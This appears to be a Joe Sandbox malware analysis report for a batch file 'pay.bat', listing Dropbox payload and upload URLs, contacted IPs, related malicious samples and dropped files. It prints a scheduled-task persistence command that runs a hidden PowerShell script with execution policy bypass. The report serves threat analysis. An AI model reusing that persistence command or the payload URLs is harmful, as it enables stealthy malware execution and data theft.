                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.drHpowershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://contoso.com/Licensepowershell.exe, 00000003.00000002.1957253822.0000019FCB037000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contoso.com/Iconpowershell.exe, 00000003.00000002.1957253822.0000019FCB037000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000002.00000002.1821493344.000002C3DBA0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DB9E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://api.dropboxapi.compowershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://content.dropboxapi.compowershell.exe, 00000002.00000002.1821493344.000002C3DB09F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBD3EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://api.dropboxapi.com/oauth2/toppowershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://api-env.dropbox-dns.compowershell.exe, 00000002.00000002.1821493344.000002C3DB033000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://dl.dropboxusercontent.com/scl/fi/g7mcshpowershell.exe, 00000002.00000002.1821493344.000002C3DADD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://dropboxusercontent.com/powershell.exe, 00000002.00000002.1821493344.000002C3DAF45000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://dl.dropboxusercontent.com/scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x.txt?rlkey=5nbbqegc5a77r76hiypowershell.exe, 00000002.00000002.1821493344.000002C3DA8D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://content.dropboxapi.compowershell.exe, 00000002.00000002.1821493344.000002C3DB09F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBD3EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://api.dropboxapi.com/oauppowershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://content.dropboxapi.com/2/files/uploppowershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://dl.dropboxusercontent.com/scl/fi/dkuamlrlsrbygso1swn8p/santa2-f.txt?rlkey=r8fe0viier1mwv9azkpowershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmp, chrome.ps1.2.drfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.1821493344.000002C3D9CEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://contoso.com/powershell.exe, 00000003.00000002.1957253822.0000019FCB037000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1844637093.000002C3E9B32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1957253822.0000019FCAEB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://api.dropboxappowershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://content.droppowershell.exe, 00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmp, system_first.ps1.2.dr, temp.ps1.3.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://edge-block-www-env.dropbox-dns.compowershell.exe, 00000002.00000002.1821493344.000002C3DAEFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://content.dropboxapi.com/2/fppowershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://dl.dropboxusercontent.com/scl/fi/g7mcshkx3qmo5mvytf2ct/santa2-x.txt?rlkey=5nbbqegc5apowershell.exe, 00000002.00000002.1821493344.000002C3DAE08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://aka.ms/pscore68powershell.exe, 00000002.00000002.1821493344.000002C3D9AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBAE41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://api.dropboxapi.com/oauth2/tokenppowershell.exe, 00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.dropbox.com/csp_log?policy_name=blockserver-noscriptpowershell.exe, 00000002.00000002.1821493344.000002C3DAF1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1821493344.000002C3DAEFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB21A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB227000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://crl.microsoftz8powershell.exe, 00000003.00000002.1968058446.0000019FD31A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://api.dropboxapi.compowershell.exe, 00000002.00000002.1821493344.000002C3DB033000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1821493344.000002C3D9AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBAE41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://dl.dropboxusercontent.com/powershell.exe, 00000002.00000002.1821493344.000002C3DAD5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://dl.dropboxusercontent.compowershell.exe, 00000002.00000002.1821493344.000002C3DAEBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1836552794.0000019FBB061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high

                                                                                                              World Map of Contacted IPs

                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public IPs

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              162.125.65.15
                                                                                                              		edge-block-www-env.dropbox-dns.comUnited States
                                                                                                              		19679DROPBOXUSfalse
                                                                                                              162.125.69.19
                                                                                                              		api-env.dropbox-dns.comUnited States
                                                                                                              		19679DROPBOXUSfalse
                                                                                                              162.125.69.14
                                                                                                              		edge-block-api-env.dropbox-dns.comUnited States
                                                                                                              		19679DROPBOXUSfalse

                                                                                                              General Information

                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1563601
                                                                                                              Start date and time:2024-11-27 08:28:05 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 4m 51s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:9
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:pay.bat
                                                                                                              Detection:MAL
                                                                                                              Classification:mal96.troj.evad.winBAT@6/14@3/3
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 63%
                                                                                                              • Number of executed functions: 13
                                                                                                              • Number of non-executed functions: 6
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .bat

                                                                                                              Warnings

                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size getting too big, too many NtCreateKey calls found.

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              TimeTypeDescription
                                                                                                              02:28:58API Interceptor87x Sleep call for process: powershell.exe modified
                                                                                                              07:29:02Task SchedulerRun new task: ChromeUpdateTaskMachine path: PowerShell.exe s>-WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "&amp; {$abc = Join-Path ($env:AppData) \"chrome.ps1\"; &amp; $abc;}"

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              162.125.65.15protected.ps1Get hashmaliciousUnknownBrowse
                                                                                                                https://www.dropbox.com/l/AADw7QsXXUEgtGMTkaD6s_noiLvCBcZslDg/downloadingGet hashmaliciousUnknownBrowse
                                                                                                                  35N4PXWcmC.msiGet hashmaliciousUnknownBrowse
                                                                                                                    162.125.69.19offices.ini.dllGet hashmaliciousUnknownBrowse
                                                                                                                      162.125.69.14bshS53Wc.posh.ps1Get hashmaliciousUnknownBrowse
                                                                                                                        offices.ini.dllGet hashmaliciousUnknownBrowse

                                                                                                                          Domains

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          edge-block-api-env.dropbox-dns.comSfXgy8lFUR.lnkGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.66.14
                                                                                                                          E78jryaJ.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.66.14
                                                                                                                          RBmbghu3.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.66.14
                                                                                                                          F1ycmYA3.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.66.14
                                                                                                                          WAJWF4NS.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.66.14
                                                                                                                          jVeXCTvr.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.66.14
                                                                                                                          WK6RB9ih.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.2.14
                                                                                                                          nzbQP3Dd.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.2.14
                                                                                                                          unpacked.exeGet hashmaliciousROKRATBrowse
                                                                                                                          • 162.125.4.14
                                                                                                                          11111.lnkGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.6.14
                                                                                                                          edge-block-www-env.dropbox-dns.comhttps://dl.dropboxusercontent.com/scl/fi/zwwtq189ncebo2kcft2qa/Nulo-PPC-Tracking-Report-2025.zip?rlkey=lvid9bjy47pkluerl2jbf5wun&st=bhhac8iv&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.69.15
                                                                                                                          20mktbose2.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.69.15
                                                                                                                          2024_11_11_Product advertising hotpoint.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          hnl2bose13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          13jhsfbose.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          scut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          api-env.dropbox-dns.comdropbox.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.66.19
                                                                                                                          dropbox.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.66.19
                                                                                                                          SfXgy8lFUR.lnkGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.66.14
                                                                                                                          E78jryaJ.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.66.14
                                                                                                                          RBmbghu3.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.66.14
                                                                                                                          F1ycmYA3.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.66.14
                                                                                                                          WAJWF4NS.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.66.14
                                                                                                                          jVeXCTvr.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.66.14
                                                                                                                          WK6RB9ih.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.2.14
                                                                                                                          nzbQP3Dd.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                                          • 162.125.2.14

                                                                                                                          ASNs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          DROPBOXUShttps://docsend.com/view/ygpcsdciay42c22xGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.1.20
                                                                                                                          https://dl.dropboxusercontent.com/scl/fi/zwwtq189ncebo2kcft2qa/Nulo-PPC-Tracking-Report-2025.zip?rlkey=lvid9bjy47pkluerl2jbf5wun&st=bhhac8iv&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.69.15
                                                                                                                          20mktbose2.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.69.18
                                                                                                                          20bosemkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.65.18
                                                                                                                          2024_11_11_Product advertising hotpoint.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          https://www.dropbox.com/l/scl/AACfaxhMBCajpVJfxiny0jrZK6hv1s8xd2MGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.1.20
                                                                                                                          bose18mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          hnbose1711.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          hnl2bose13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          DROPBOXUShttps://docsend.com/view/ygpcsdciay42c22xGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.1.20
                                                                                                                          https://dl.dropboxusercontent.com/scl/fi/zwwtq189ncebo2kcft2qa/Nulo-PPC-Tracking-Report-2025.zip?rlkey=lvid9bjy47pkluerl2jbf5wun&st=bhhac8iv&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.69.15
                                                                                                                          20mktbose2.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.69.18
                                                                                                                          20bosemkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.65.18
                                                                                                                          2024_11_11_Product advertising hotpoint.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          https://www.dropbox.com/l/scl/AACfaxhMBCajpVJfxiny0jrZK6hv1s8xd2MGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.1.20
                                                                                                                          bose18mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          hnbose1711.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          hnl2bose13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          DROPBOXUShttps://docsend.com/view/ygpcsdciay42c22xGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.1.20
                                                                                                                          https://dl.dropboxusercontent.com/scl/fi/zwwtq189ncebo2kcft2qa/Nulo-PPC-Tracking-Report-2025.zip?rlkey=lvid9bjy47pkluerl2jbf5wun&st=bhhac8iv&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.69.15
                                                                                                                          20mktbose2.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.69.18
                                                                                                                          20bosemkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.65.18
                                                                                                                          2024_11_11_Product advertising hotpoint.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.66.15
                                                                                                                          https://www.dropbox.com/l/scl/AACfaxhMBCajpVJfxiny0jrZK6hv1s8xd2MGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.1.20
                                                                                                                          bose18mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          hnbose1711.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          hnl2bose13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                          • 162.125.66.18
                                                                                                                          2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                          • 162.125.66.18

                                                                                                                          JA3 Fingerprints

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          Po-5865A.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          https://www.gogetsy.com/downloads/eyJmaWxlX2lkIjoiMTIwMDY1NzY3MjE3NSIsInRyYW5zYWN0aW9uX2lkIjoiMzgyNDQ4NTYwOSIsImV2ZW50IjoiZG93bmxvYWQiLCJub25jZSI6IjY3M2NlODI0MTU2ZGQ2NzNjZTgyNDE1NmRmNjczY2U4MjQxNTZlMDY3M2NlODI0MTU2ZTEiLCJ0aW1lc3RhbXAiOjE3MzIwNDQ4MzZ9/0ff3c9f2d9eae28f5e9880589ecb55882049889393d1e096fca15f339c17e418Get hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          ZipRipper.cmdGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          CUVAs_ Closing Doc_ The Abram Law Group #RDZ-01.emlGet hashmaliciousCredentialStealer, HTMLPhisherBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          z51awb_shipping.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          http://www.trilogyrez.comGet hashmaliciousUnknownBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          DOCUMENTS, COI - Trilogy Investment Company.emlGet hashmaliciousCredentialStealerBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19
                                                                                                                          z705688y7t7tgggju97867756576.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 162.125.69.14
                                                                                                                          • 162.125.65.15
                                                                                                                          • 162.125.69.19

                                                                                                                          Dropped Files

                                                                                                                          No context

                                                                                                                          Created / dropped Files

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1836
                                                                                                                          Entropy (8bit):5.693190364233567
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:YSU4Yymdax4RIoUP7m9qr9trBLNGIy+ffi589qyZ3DVww:pHYv+IfB9qrPBRGIyMKMqy1DVww
                                                                                                                          MD5:F7D00C2DC2EA606C9A2E4AA30F4EE346
                                                                                                                          SHA1:7F0CC6E0BB56772C9A653224F4FB22EF9FC4CC82
                                                                                                                          SHA-256:3A99F0EDFCDD3D0CEFF3C7203674FFD8709D9AA35F1F3F9FE27564390DB2307D
                                                                                                                          SHA-512:5E4A83D4E8D8947E5C1CEFC8E900587F870A05FFCD339BB1CD17DF9BBE16B785D99ADBEBC88FE746DA8699DBDC529735E57BC56C0BCEF952363F7C2F8F82728F
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:@...e...........^....................................@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.Management

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41nzjtcu.ndd.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Reputation:high, very likely benign file
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccx5qeac.es5.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Reputation:high, very likely benign file
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_epfdq3no.ptj.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfo4p2yf.xja.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivyd0xth.nko.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
